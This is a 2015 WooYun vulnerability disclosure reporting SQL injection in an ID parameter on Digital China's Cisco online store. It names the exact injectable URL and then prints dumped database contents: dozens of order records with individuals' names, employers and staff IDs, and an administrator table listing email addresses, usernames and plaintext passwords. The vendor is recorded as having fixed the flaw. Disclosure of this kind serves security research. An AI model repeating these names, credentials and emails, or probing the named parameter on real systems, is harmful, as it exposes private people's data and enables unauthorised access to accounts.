当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140300

漏洞标题:神州数码某网上商城SQL注入(大量订单/管理员账号/密码泄露)

相关厂商:digitalchina.com

漏洞作者: 深度安全实验室

提交时间:2015-09-11 10:00

修复时间:2015-10-19 17:08

公开时间:2015-10-19 17:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-11: 细节已通知厂商并且等待厂商处理中
2015-09-11: 厂商已经确认,细节仅向厂商公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-19: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt

详细说明:

神州数码思科网上商城

http://www.ciscostation.com.cn/index.jsp

1.png


如下链接存在SQL注入,其中,ID参数有问题

http://www.ciscostation.com.cn/NewsView.jsp?ID=3364

2.png

漏洞证明:

发现6个库

3.png


以cisstation库为例,发现153个表

4.png


以moneyjl表为例,发现大量订单信息

Database: cisstation
Table: moneyjl
[51 entries]
+----+---------------+-------+-----------------+---------------------------------+------------+----------+
| id | number | sqrxm | sqrgs | prize | stime | proposer |
+----+---------------+-------+-----------------+---------------------------------+------------+----------+
| 33 | 1210233764000 | 柳萌 | 神州数码(中国)有限公司 | Apple Phone(或同等价值礼品) | 2008-05-08 | SE6907 |
| 34 | 1212033986300 | 孔娜 | 北京安达信通系统集成有限公司 | 笔记本电脑(或同等价值礼品) | 2008-05-29 | SE4981 |
| 35 | 1212034028500 | 孔娜 | 北京安达信通系统集成有限公司 | Apple Phone(或同等价值礼品) | 2008-05-29 | SE4981 |
| 36 | 1212034054700 | 孔娜 | 北京安达信通系统集成有限公司 | Sony PSP(或同等价值礼品) | 2008-05-29 | SE4981 |
| 37 | 1212044933300 | 程娟 | 北京阳光世远科技发展有限公司 | 数码相机(或同等价值礼品) | 2008-05-29 | SE1229 |
| 38 | 1212045327000 | 杨征宇 | 深圳市新链路科技有限公司 | Apple Phone(或同等价值礼品) | 2008-05-29 | SE1404 |
| 39 | 1213603970400 | 赵平英 | 北京明道泰和信息技术有限公司 | 笔记本电脑(或同等价值礼品) | 2008-06-16 | SE4257 |
| 40 | 1213608749800 | 孔娜 | 北京安达信通系统集成有限公司 | 笔记本电脑(或同等价值礼品) | 2008-06-16 | SE4981 |
| 41 | 1213608761100 | 孔娜 | 北京安达信通系统集成有限公司 | 任天堂NDS游戏机(或同等价值礼品) | 2008-06-16 | SE4981 |
| 42 | 1213692506900 | 杨征宇 | 深圳市新链路科技有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-06-17 | SE1404 |
| 43 | 1213837620000 | 李静 | 陕西瑞金电子科技有限公司 | 笔记本电脑(或同等价值礼品) | 2008-06-19 | SE8414 |
| 44 | 1215540525400 | 王晨 | 上海蝶桥网络信息技术有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-07-09 | SE5104 |
| 45 | 1215540656800 | 王晨 | 上海蝶桥网络信息技术有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-07-09 | SE5104 |
| 46 | 1217819597400 | 赵平英 | 北京明道泰和信息技术有限公司 | 笔记本电脑(或同等价值礼品) | 2008-08-04 | SE4257 |
| 47 | 1220327281900 | 方庆美 | 北京惠友天利科技发展有限公司 | 笔记本电脑(或同等价值礼品) | 2008-09-02 | SE4653 |
| 48 | 1221715303100 | 陈霞 | 苏州南大苏富特科技有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-09-18 | SE1706 |
| 49 | 1222051736800 | 李静 | 陕西瑞金电子科技有限公司 | 笔记本电脑(或同等价值礼品) | 2008-09-22 | SE8414 |
| 50 | 1222225203600 | 周兆卿 | 北京通天至达科技发展有限公司 | 笔记本电脑(或同等价值礼品) | 2008-09-24 | WL1151 |
| 51 | 1222480500600 | 杨征宇 | 深圳市新链路科技有限公司 | 笔记本电脑(或同等价值礼品) | 2008-09-27 | SE1404 |
| 52 | 1223617186200 | 黄瑜 | 北京格林恒业科技有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-10-10 | SE1414 |
| 53 | 1223867038900 | 周兆卿 | 北京通天在线科贸有限公司 | 笔记本电脑(或同等价值礼品) | 2008-10-13 | SE7227 |
| 54 | 1223888182300 | 赵平英 | 北京明道泰和信息技术有限公司 | 笔记本电脑(或同等价值礼品) | 2008-10-13 | SE4257 |
| 55 | 1223964920700 | 周虹怡 | 上海国腾致瑞科技有限公司 | 笔记本电脑(或同等价值礼品) | 2008-10-14 | SE4223 |
| 56 | 1225079010900 | 吴娉 | 苏州工业园区纵横计算机有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-10-27 | SE8391 |
| 57 | 1225159736200 | 杨祝 | 安徽轻工国际贸易股份有限公司 | 任天堂NDS游戏机(或同等价值礼品) | 2008-10-28 | SE5382 |
| 58 | 1225778150200 | 钱维娜 | 上海有为信息技术有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-11-04 | WL6875 |
| 59 | 1225778906200 | 方庆美 | 北京惠友天利科技发展有限公司 | 数码相机(或同等价值礼品) | 2008-11-04 | SE4653 |
| 60 | 1226454812500 | 胡敏 | 重庆怡讯网络技术有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-11-12 | SE6403 |
| 61 | 1226643245400 | 胡正刚 | 北京天正楦科网络技术有限公司 | 笔记本电脑(或同等价值礼品) | 2008-11-14 | SE4390 |
| 62 | 1226643257000 | 胡正刚 | 北京天正楦科网络技术有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-11-14 | SE4390 |
| 63 | 1227060073600 | 杨征宇 | 深圳市信德远致科技有限公司 | 任天堂NDS游戏机(或同等价值礼品) | 2008-11-19 | SE7169 |
| 64 | 1227163068600 | 李静 | 陕西瑞金电子科技有限公司 | 笔记本电脑(或同等价值礼品) | 2008-11-20 | SE8414 |
| 65 | 1227520163600 | 于惊涛 | 上海三零卫士信息安全有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-11-24 | SE3436 |
| 66 | 1227576751900 | 金明乐 | 郑州创元计算机网络工程有限公司 | 数码相机(或同等价值礼品) | 2008-11-25 | SE1710 |
| 67 | 1227578325100 | 胡正刚 | 北京天正楦科网络技术有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-11-25 | SE4390 |
| 68 | 1227602260600 | 赵平英 | 北京明道泰和信息技术有限公司 | 笔记本电脑(或同等价值礼品) | 2008-11-25 | SE4257 |
| 69 | 1227666858000 | 飞翔 | 北京里奥卢夫广告有限公司 | 专家级工程师调用(可提供网络架构及项目咨询、工程师培训等服务) | 2008-11-26 | SE8512 |
| 70 | 1227667829400 | 武朋霞 | 北京雨禾盛科技有限公司 | 笔记本电脑(或同等价值礼品) | 2008-11-26 | SE7233 |
| 71 | 1228267495400 | 刘强 | 成都赛恩计算机网络技术有限公司 | 吹风机 | 2008-12-03 | SE1462 |
| 72 | 1228267517500 | 刘强 | 成都赛恩计算机网络技术有限公司 | 超薄U盘 | 2008-12-03 | SE1462 |
| 73 | 1228267666100 | 刘强 | 成都赛恩计算机网络技术有限公司 | 家用字母电话机 | 2008-12-03 | SE1462 |
| 74 | 1228293385100 | 史伟鹏 | 北京鑫网杰通讯技术有限公司 | 床上四件套 | 2008-12-03 | SE4951 |
| 75 | 1228293402300 | 史伟鹏 | 北京鑫网杰通讯技术有限公司 | 车载小冰箱 | 2008-12-03 | SE4951 |
| 76 | 1228359392200 | 史伟鹏 | 北京鑫网杰通讯技术有限公司 | 卡西欧手表 | 2008-12-04 | SE4951 |
| 77 | 1228381532600 | 丁琼 | 武汉汇通时代信息技术有限公司 | 吹风机 | 2008-12-04 | SE4768 |
| 78 | 1228381565900 | 丁琼 | 武汉汇通时代信息技术有限公司 | 超薄U盘 | 2008-12-04 | SE4768 |
| 79 | 1228467361300 | 史伟鹏 | 北京鑫网杰通讯技术有限公司 | 车载小冰箱 | 2008-12-05 | SE4951 |
| 80 | 1228467405000 | 史伟鹏 | 北京鑫网杰通讯技术有限公司 | 床上四件套 | 2008-12-05 | SE4951 |
| 81 | 1228814864900 | 王英杰 | 北京世纪华风科技发展有限公司 | 熨斗 | 2008-12-09 | SE8376 |
| 82 | 1228815002600 | 王英杰 | 北京世纪华风科技发展有限公司 | 超薄U盘 | 2008-12-09 | SE8376 |
| 83 | 1228815052300 | 王英杰 | 北京世纪华风科技发展有限公司 | 多功能读卡器 | 2008-12-09 | SE8376 |
+----+---------------+-------+-----------------+---------------------------------+------------+----------+


以ucadmin表为例,发现管理员的账号、密码、邮箱

Database: cisstation
Table: ucadmin
[5 entries]
+----+--------------------------+-----------+--------------+----------+-----------+
| ID | email | address | username | quanxian | password |
+----+--------------------------+-----------+--------------+----------+-----------+
| 1 | wangleb@digitalchina.com | beijing | bjadmin | 3 | kaixin001 |
| 2 | shengtt@digitalchina.com | shanghai | shanghai2008 | 3 | sh2008 |
| 3 | <blank> | beijing | admin | 1 | 000000 |
| 4 | <blank> | beijing | super | 4 | super2548 |
| 5 | wanch@digitalchina.com | guangzhou | gz2008 | 3 | gz2008 |
+----+--------------------------+-----------+--------------+----------+-----------+

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-11 10:27

厂商回复:

尽快处理

最新状态:

2015-10-19:已修复


漏洞评价:

评论